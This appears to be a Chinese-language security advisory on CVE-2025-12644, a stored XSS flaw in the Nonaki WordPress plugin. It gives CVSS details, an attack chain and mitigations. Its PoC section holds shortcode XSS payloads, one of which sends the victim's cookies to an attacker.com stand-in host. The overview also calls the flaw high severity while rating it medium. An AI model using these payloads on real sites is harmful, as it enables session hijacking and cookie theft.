CVE-2025-12644 WordPress Nonaki插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12644

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nonaki – Drag and Drop Email Template builder and Newsletter plugin for WordPress

漏洞概述

CVE-2025-12644是WordPress插件Nonaki中的一个高危安全漏洞。该插件是一款用于构建拖拽式邮件模板和新闻通讯的流行工具，被广泛应用于WordPress网站中。漏洞根源在于插件的shortcode功能对用户提供的自定义字段值缺乏充分的输入清理和输出转义处理。攻击者只需拥有WordPress contributor级别的账户权限，即可利用此漏洞在页面中注入恶意JavaScript脚本。由于是存储型XSS，恶意代码会被永久保存在服务器端，当其他用户访问包含恶意内容的页面时，攻击脚本会自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。此漏洞影响插件1.0.11及之前所有版本，CVSS评分6.4，属于中等严重程度。

技术细节

该漏洞存在于Nonaki插件的shortcode处理机制中，具体位置在includes/shortcode.php第21行和includes/helper.php第108行附近。问题出在插件通过[nonaki]短代码渲染用户自定义字段内容时，未对用户输入进行适当的HTML转义和输入验证。攻击者可以在shortcode属性或相关配置中嵌入恶意脚本内容，这些内容会被存储到数据库中。当页面渲染时，浏览器会执行这些未转义的脚本代码。攻击者利用此漏洞可以窃取受害者的认证cookie、劫持用户会话、进行钓鱼攻击或重定向用户到恶意网站。由于WordPress的contributor角色本身具有创建和编辑文章的能力，攻击门槛相对较低，攻击者可以在文章或页面中嵌入恶意shortcode，等待管理员或其他用户访问时触发攻击。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本和Nonaki插件版本，确认漏洞存在于1.0.11及之前版本

STEP 2

初始访问

攻击者通过注册或盗取获得WordPress contributor级别账户，获得创建和编辑内容的权限

STEP 3

漏洞利用准备

攻击者创建或编辑文章/页面，在内容中插入包含恶意JavaScript代码的[nonaki]短代码

STEP 4

恶意代码存储

包含恶意脚本的内容被保存到WordPress数据库中，由于缺乏输入验证，脚本代码被原样存储

STEP 5

触发执行

当管理员或普通用户访问包含恶意内容的页面时，服务器返回未转义的HTML内容，浏览器执行注入的脚本

STEP 6

攻击成功

攻击者通过JavaScript代码窃取用户cookie、会话信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Nonaki Plugin Stored XSS PoC -->
<!-- Attacker with contributor role can inject malicious script via shortcode -->

<!-- Basic XSS injection through nonaki shortcode -->
[nonaki id="1" custom_field="<script>alert(document.cookie)</script>"]

<!-- More sophisticated payload for session hijacking -->
[nonaki id="1" field_name="<img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>']

<!-- PoC to demonstrate the vulnerability -->
<!-- Steps: -->
<!-- 1. Login as contributor user -->
<!-- 2. Create/edit a post or page -->
<!-- 3. Insert the malicious shortcode -->
<!-- 4. Publish the content -->
<!-- 5. When any user visits the page, the XSS will execute -->

<!-- Example WordPress shortcode that triggers the vulnerability -->
[nonaki id="123" title="Test" custom_data='"><script>console.log("XSS Triggered")</script><!']

影响范围

Nonaki Email Template Customizer plugin <= 1.0.11

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用Nonaki插件；2) 限制除管理员外的所有用户使用shortcode功能；3) 启用Wordfence等安全插件的防火墙规则；4) 对所有用户角色取消contributor及以上级别的文章发布权限，改为仅允许提交草稿待审核；5) 实施严格的CSP策略限制脚本执行。